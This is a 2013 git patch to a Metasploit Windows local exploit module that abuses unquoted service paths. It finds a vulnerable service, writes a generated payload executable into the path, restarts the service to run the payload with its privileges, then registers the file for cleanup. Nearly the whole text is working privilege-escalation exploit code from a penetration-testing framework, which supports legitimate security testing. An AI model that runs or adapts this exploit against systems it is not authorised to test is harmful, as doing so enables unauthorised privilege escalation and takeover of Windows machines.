From 101e5a8ccfc9d3b736b8571d11a3930a8558ada8 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Tue, 17 Dec 2013 01:46:45 +0000 Subject: [PATCH] Tidyup trusted_service_path Use filedropper, use service exe, dont migrate --- .../windows/local/trusted_service_path.rb | 54 ++++--------------- 1 file changed, 11 insertions(+), 43 deletions(-) diff --git a/modules/exploits/windows/local/trusted_service_path.rb b/modules/exploits/windows/local/trusted_service_path.rb index 61adb9f6a5..47cdae6c29 100644 --- a/modules/exploits/windows/local/trusted_service_path.rb +++ b/modules/exploits/windows/local/trusted_service_path.rb @@ -9,6 +9,7 @@ require 'msf/core/exploit/exe' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking + include Msf::Exploit::FileDropper include Msf::Exploit::EXE include Msf::Post::File include Msf::Post::Windows::Services @@ -44,10 +45,8 @@ class Metasploit3 < Msf::Exploit::Local ], 'Platform' => [ 'win'], 'Targets' => [ ['Windows', {}] ], - 'SessionTypes' => [ "shell", "meterpreter" ], + 'SessionTypes' => [ "meterpreter" ], 'DefaultTarget' => 0, - # Migrate away, in case the service dies (can kill access) - 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' } )) end @@ -77,8 +76,8 @@ class Metasploit3 < Msf::Exploit::Local next if cmd !~ /^[a-z]\:.+\.exe$/i next if not cmd.split("\\").map {|p| true if p =~ / /}.include?(true) - vprint_status("Found vulnerable service: #{name} - #{cmd} (#{info['Credentials']})") - vuln_services << [name, cmd] + vprint_status("Found vulnerable service: #{service[:name]} - #{cmd} (#{info[:startname]})") + vuln_services << [service[:name], cmd] # This process can be pretty damn slow. # Allow the user to just find one, and get the hell out. @@ -95,63 +94,32 @@ class Metasploit3 < Msf::Exploit::Local # print_status("Finding a vulnerable service...") svrs = enum_vuln_services(true) - if svrs.empty? - print_error("No service found with trusted path issues") - return - end + + fail_with(Failure::NotVulnerable, "No service found with trusted path issues") if svrs.empty? svr_name = svrs.first[0] fpath = svrs.first[1] exe_path = "#{fpath.split(' ')[0]}.exe" - print_status("Placing #{exe_path} as #{svr_name}") - + print_status("Placing #{exe_path} for #{svr_name}") # # Drop the malicious executable into the path # - exe = generate_payload_exe + exe = generate_payload_exe_service({:servicename=>svr_name}) print_status("Writing #{exe.length.to_s} bytes to #{exe_path}...") begin write_file(exe_path, exe) + register_files_for_cleanup(exe_path) rescue Rex::Post::Meterpreter::RequestError => e # Can't write the file, can't go on - print_error(e.message) - return + fail_with(Failure::Unknown, e.message) end - # # Run the service, let the Windows API do the rest # print_status("Launching service #{svr_name}...") - tried = false - begin - status = service_start(svr_name) - raise RuntimeError, status if status != Error::SUCCESS - rescue RuntimeError => s - if tried - print_error("Unable to start #{svr_name}") - return - else - tried = true - end - - case s.message.to_i - when Error::SERVICE_ALREADY_RUNNING - service_stop(svr_name) - retry - when Error::SERVICE_DISABLED - service_change_startup(svr_name, 'manual') - retry - end - end - - - # - # "Nothing ever happened, we swears it on the Precious!" - # - print_status("Deleting #{exe_path}") - file_rm(exe_path) + service_restart(svr_name) end end